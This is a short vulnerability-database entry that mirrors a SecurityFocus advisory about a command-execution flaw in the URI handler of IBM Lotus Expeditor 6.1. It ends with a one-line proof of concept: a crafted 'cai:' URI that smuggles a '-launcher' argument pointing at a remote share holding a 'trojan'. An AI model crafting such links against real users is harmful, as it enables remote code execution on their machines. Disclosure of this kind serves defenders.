IBM Lotus Expeditor 6.1 - URI Handler Command Execution Vulnerability

2014-07-01T00:00:00
ID SSV:85021
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/28926/info

IBM Lotus Expeditor is prone to a command-execution vulnerability because it fails to properly sanitize input.

Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.

We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges. 

cai:"%20-launcher%20\\6.6.6.6\d$\trojan